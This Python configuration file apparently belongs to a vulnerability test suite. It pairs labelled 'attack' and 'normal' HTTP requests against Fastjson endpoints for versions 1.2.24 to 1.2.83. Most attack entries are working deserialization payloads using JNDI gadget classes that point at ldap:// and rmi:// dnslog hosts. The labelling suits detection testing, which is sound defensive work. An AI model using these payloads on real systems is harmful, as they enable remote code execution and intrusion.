# Auto-generated from index/vul.py split by module.
import os

host = os.environ.get('HOST', '192.168.0.9')

requests_config = {'fastjson1_2_24_attack': {'method': 'POST',
                           'url': 'http://{}:9999/fastjson1.2.24-process'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://fastjson-test.dnslog.cn","autoCommit":true}};',
                           'name': 'fastjson-1.2.24反序列漏洞',
                           'type': 'attack'},
 'fastjson_1_2_24_normal': {'method': 'POST',
                            'url': 'http://{}:9999/fastjson1.2.24-process'.format(host),
                            'headers': {'Content-Type': 'application/json'},
                            'data': '{"name":"123","email":"123@123","age":"123"}',
                            'name': 'fastjson-1.2.24反序列漏洞',
                            'type': 'normal'},
 'fastjson1_2_25_attack': {'method': 'POST',
                           'url': 'http://{}:9987/fastjson1.2.25-process'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://fastjson125.dnslog.cn","autoCommit":true}}',
                           'name': 'fastjson-1.2.25-1.2.47反序列漏洞-不需要AutoTypeSupport-通杀',
                           'type': 'attack'},
 'fastjson1_2_25_normal': {'method': 'POST',
                           'url': 'http://{}:9987/fastjson1.2.25-process'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"name":"123","email":"123@123","age":"123"}',
                           'name': 'fastjson-1.2.25-1.2.41反序列漏洞-disableAutoTypeSupport',
                           'type': 'normal'},
 'fastjson1_2_41_attack': {'method': 'POST',
                           'url': 'http://{}:9987/fastjson1.2.41-process-setAutoTypeSupport'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://fastjson125-141-setAutoTypeSupport.dnslog.cn","autoCommit":true}',
                           'name': 'fastjson-1.2.25-1.2.41反序列漏洞-setAutoTypeSupport',
                           'type': 'attack'},
 'fastjson1_2_41_normal': {'method': 'POST',
                           'url': 'http://{}:9987/fastjson1.2.41-process-setAutoTypeSupport'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"name":"123","email":"123@123","age":"123"}',
                           'name': 'fastjson-1.2.25-1.2.41反序列漏洞-setAutoTypeSupport',
                           'type': 'normal'},
 'fastjson1_2_42_attack': {'method': 'POST',
                           'url': 'http://{}:9986/fastjson1.2.42-process'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://fastjson1_2_42_attack.dnslog.cn/Exploit", '
                                   '"autoCommit":true}',
                           'name': 'fastjson-1.2.42反序列漏洞',
                           'type': 'attack'},
 'fastjson1_2_42_normal': {'method': 'POST',
                           'url': 'http://{}:9986/fastjson1.2.42-process'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"name":"123","email":"123@123","age":"123"}',
                           'name': 'fastjson-1.2.42反序列漏洞',
                           'type': 'normal'},
 'fastjson1_2_43_attack': {'method': 'POST',
                           'url': 'http://{}:9985/fastjson1.2.43-process'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"rmi://fastjson1_2_43_attack.dnslog.cn/Exploit","autoCommit":true]}',
                           'name': 'fastjson-1.2.43反序列漏洞',
                           'type': 'attack'},
 'fastjson1_2_43_normal': {'method': 'POST',
                           'url': 'http://{}:9985/fastjson1.2.43-process'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"name":"123","email":"123@123","age":"123"}',
                           'name': 'fastjson-1.2.43反序列漏洞',
                           'type': 'normal'},
 'fastjson1_2_45_attack': {'method': 'POST',
                           'url': 'http://{}:9984/fastjson1.2.45-process'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://fastjson1.2.45-process.dnslog.cn/Exploit"}}',
                           'name': 'fastjson-1.2.45反序列漏洞',
                           'type': 'attack'},
 'fastjson1_2_45_normal': {'method': 'POST',
                           'url': 'http://{}:9984/fastjson1.2.45-process'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"name":"123","email":"123@123","age":"123"}',
                           'name': 'fastjson-1.2.45反序列漏洞',
                           'type': 'normal'},
 'fastjson1_2_59_attack_1': {'method': 'POST',
                             'url': 'http://{}:9983/fastjson1.2.59-process'.format(host),
                             'headers': {'Content-Type': 'application/json'},
                             'data': '{"@type":"com.zaxxer.hikari.HikariConfig","metricRegistry":"rmi://fastjson1.2.59-process.dnslog.cn/Exploit"}',
                             'name': 'fastjson-1.2.59反序列漏洞(1.2.5 <= 1.2.59)-payload1',
                             'type': 'attack'},
 'fastjson1_2_59_attack_2': {'method': 'POST',
                             'url': 'http://{}:9983/fastjson1.2.59-process'.format(host),
                             'headers': {'Content-Type': 'application/json'},
                             'data': '{"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"rmi://fastjson1.2.59-process.dnslog.cn/Exploit"}',
                             'name': 'fastjson-1.2.59反序列漏洞(1.2.5 <= 1.2.59)-payload2',
                             'type': 'attack'},
 'fastjson1_2_59_normal': {'method': 'POST',
                           'url': 'http://{}:9983/fastjson1.2.59-process'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"name":"123","email":"123@123","age":"123"}',
                           'name': 'fastjson-1.2.59反序列漏洞(1.2.5 <= 1.2.59)',
                           'type': 'normal'},
 'fastjson1_2_60_attack_1': {'method': 'POST',
                             'url': 'http://{}:9982/fastjson1.2.60-process'.format(host),
                             'headers': {'Content-Type': 'application/json'},
                             'data': '{"@type":"oracle.jdbc.connector.OracleManagedConnectionFactory","xaDataSourceName":"rmi://fastjson1.2.60-process.dnslog.cn/ExportObject"}',
                             'name': 'fastjson-1.2.60反序列漏洞(1.2.5 <= 1.2.60)-payload1',
                             'type': 'attack'},
 'fastjson1_2_60_attack_2': {'method': 'POST',
                             'url': 'http://{}:9982/fastjson1.2.60-process'.format(host),
                             'headers': {'Content-Type': 'application/json'},
                             'data': '{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"rmi://fastjson1.2.60-process.dnslog.cn/ExportObject"}',
                             'name': 'fastjson-1.2.60反序列漏洞(1.2.5 <= 1.2.60)-payload2',
                             'type': 'attack'},
 'fastjson1_2_60_normal': {'method': 'POST',
                           'url': 'http://{}:9982/fastjson1.2.60-process'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"name":"123","email":"123@123","age":"123"}',
                           'name': 'fastjson-1.2.60反序列漏洞(1.2.5 <= 1.2.60)',
                           'type': 'normal'},
 'fastjson1_2_61_attack_1': {'method': 'POST',
                             'url': 'http://{}:9981/fastjson1.2.61-process'.format(host),
                             'headers': {'Content-Type': 'application/json'},
                             'data': '{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"rmi://fastjson1.2.61-process.dnslog.cn/Exploit"}',
                             'name': 'fastjson-1.2.61反序列漏洞-payload1',
                             'type': 'attack'},
 'fastjson1_2_61_attack_2': {'method': 'POST',
                             'url': 'http://{}:9981/fastjson1.2.61-process'.format(host),
                             'headers': {'Content-Type': 'application/json'},
                             'data': '{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"ldap://fastjson1.2.61-process.dnslog.cn/Exploit","Object":"a"}',
                             'name': 'fastjson-1.2.61反序列漏洞-payload2',
                             'type': 'attack'},
 'fastjson1_2_61_normal': {'method': 'POST',
                           'url': 'http://{}:9981/fastjson1.2.61-process'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"name":"123","email":"123@123","age":"123"}',
                           'name': 'fastjson-1.2.61反序列漏洞',
                           'type': 'normal'},
 'fastjson1_2_62_attack_1': {'method': 'POST',
                             'url': 'http://{}:9980/fastjson1.2.62-process'.format(host),
                             'headers': {'Content-Type': 'application/json'},
                             'data': '{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://fastjson1.2.62-process.dnslog.cn/Exploit"}',
                             'name': 'fastjson-1.2.62反序列漏洞-payload1',
                             'type': 'attack'},
 'fastjson1_2_62_attack_2': {'method': 'POST',
                             'url': 'http://{}:9980/fastjson1.2.62-process'.format(host),
                             'headers': {'Content-Type': 'application/json'},
                             'data': '{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": '
                                     '{"@type":"java.util.Properties","UserTransaction":"ldap://fastjson1.2.62-process.dnslog.cn/Exploit"}}',
                             'name': 'fastjson-1.2.62反序列漏洞-payload2',
                             'type': 'attack'},
 'fastjson1_2_62_normal': {'method': 'POST',
                           'url': 'http://{}:9980/fastjson1.2.62-process'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"name":"123","email":"123@123","age":"123"}',
                           'name': 'fastjson-1.2.62反序列漏洞',
                           'type': 'normal'},
 'fastjson1_2_66_attack_1': {'method': 'POST',
                             'url': 'http://{}:9979/fastjson1.2.66-process'.format(host),
                             'headers': {'Content-Type': 'application/json'},
                             'data': '{"@type":"com.caucho.config.types.ResourceRef","LookupName":"rmi://fastjson1.2.66-process.dnslog.cn/Exploit"}',
                             'name': 'fastjson-1.2.66反序列漏洞-payload1',
                             'type': 'attack'},
 'fastjson1_2_66_attack_2': {'method': 'POST',
                             'url': 'http://{}:9979/fastjson1.2.66-process'.format(host),
                             'headers': {'Content-Type': 'application/json'},
                             'data': '{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://fastjson1.2.66-process.dnslog.cn/Exploit"}',
                             'name': 'fastjson-1.2.66反序列漏洞-payload2',
                             'type': 'attack'},
 'fastjson1_2_66_attack_3': {'method': 'POST',
                             'url': 'http://{}:9979/fastjson1.2.66-process'.format(host),
                             'headers': {'Content-Type': 'application/json'},
                             'data': '{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://fastjson1.2.66-process.dnslog.cn/Exploit"}',
                             'name': 'fastjson-1.2.66反序列漏洞-payload3',
                             'type': 'attack'},
 'fastjson1_2_66_attack_4': {'method': 'POST',
                             'url': 'http://{}:9979/fastjson1.2.66-process'.format(host),
                             'headers': {'Content-Type': 'application/json'},
                             'data': '{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://fastjson1.2.66-process.dnslog.cn/Exploit"}',
                             'name': 'fastjson-1.2.66反序列漏洞-payload4',
                             'type': 'attack'},
 'fastjson1_2_66_attack_5': {'method': 'POST',
                             'url': 'http://{}:9979/fastjson1.2.66-process'.format(host),
                             'headers': {'Content-Type': 'application/json'},
                             'data': '{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://fastjson1.2.66-process.dnslog.cn/Exploit"}',
                             'name': 'fastjson-1.2.66反序列漏洞-payload5',
                             'type': 'attack'},
 'fastjson1_2_66_attack_6': {'method': 'POST',
                             'url': 'http://{}:9979/fastjson1.2.66-process'.format(host),
                             'headers': {'Content-Type': 'application/json'},
                             'data': '{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory", '
                                     '"jndiNames":["ldap://fastjson1.2.66-process.dnslog.cn/Exploit"], "Realms":[""]}',
                             'name': 'fastjson-1.2.66反序列漏洞-payload6',
                             'type': 'attack'},
 'fastjson1_2_66_normal': {'method': 'POST',
                           'url': 'http://{}:9979/fastjson1.2.66-process'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"name":"123","email":"123@123","age":"123"}',
                           'name': 'fastjson-1.2.66反序列漏洞',
                           'type': 'normal'},
 'fastjson1_2_67_attack_1': {'method': 'POST',
                             'url': 'http://{}:9978/fastjson1.2.67-process'.format(host),
                             'headers': {'Content-Type': 'application/json'},
                             'data': '{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup", '
                                     '"jndiNames":["ldap://fastjson1.2.67-process.dnslog.cn/Exploit"], "tm": '
                                     '{"$ref":"$.tm"}}',
                             'name': 'fastjson-1.2.67反序列漏洞-payload1',
                             'type': 'attack'},
 'fastjson1_2_67_attack_2': {'method': 'POST',
                             'url': 'http://{}:9978/fastjson1.2.67-process'.format(host),
                             'headers': {'Content-Type': 'application/json'},
                             'data': '{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://fastjson1.2.67-process.dnslog.cn/Exploit","instance":{"$ref":"$.instance"}}',
                             'name': 'fastjson-1.2.67反序列漏洞-payload2',
                             'type': 'attack'},
 'fastjson1_2_67_normal': {'method': 'POST',
                           'url': 'http://{}:9978/fastjson1.2.67-process'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"name":"123","email":"123@123","age":"123"}',
                           'name': 'fastjson-1.2.67反序列漏洞',
                           'type': 'normal'},
 'fastjson1_2_68_attack_1': {'method': 'POST',
                             'url': 'http://{}:9977/fastjson1.2.68-process'.format(host),
                             'headers': {'Content-Type': 'application/json'},
                             'data': '{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://fastjson1.2.68-process.dnslog.cn/Calc"}',
                             'name': 'fastjson-1.2.68反序列漏洞-payload1',
                             'type': 'attack'},
 'fastjson1_2_68_attack_2': {'method': 'POST',
                             'url': 'http://{}:9977/fastjson1.2.68-process'.format(host),
                             'headers': {'Content-Type': 'application/json'},
                             'data': '{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://fastjson1.2.68-process.dnslog.cn/Calc"}',
                             'name': 'fastjson-1.2.68反序列漏洞-payload2',
                             'type': 'attack'},
 'fastjson1_2_68_normal': {'method': 'POST',
                           'url': 'http://{}:9977/fastjson1.2.68-process'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"name":"123","email":"123@123","age":"123"}',
                           'name': 'fastjson-1.2.68反序列漏洞',
                           'type': 'normal'},
 'fastjson1_2_80_attack': {'method': 'POST',
                           'url': 'http://{}:9976/fastjson1.2.80-process'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"@type": "java.lang.Exception","@type": "myapp.Poc","name": "ping '
                                   'fastjson1.2.80-process.dnslog.cn"}',
                           'name': 'fastjson-1.2.80反序列漏洞',
                           'type': 'attack'},
 'fastjson1_2_80_normal': {'method': 'POST',
                           'url': 'http://{}:9976/fastjson1.2.80-process'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"name":"123","email":"123@123","age":"123"}',
                           'name': 'fastjson-1.2.80反序列漏洞',
                           'type': 'normal'},
 'fastjson1_2_83_normal': {'method': 'POST',
                           'url': 'http://{}:9975/fastjson1.2.83-process'.format(host),
                           'headers': {'Content-Type': 'application/json'},
                           'data': '{"name":"123","email":"123@123","age":"123"}',
                           'name': 'fastjson-1.2.83-反序列漏洞',
                           'type': 'normal'}}
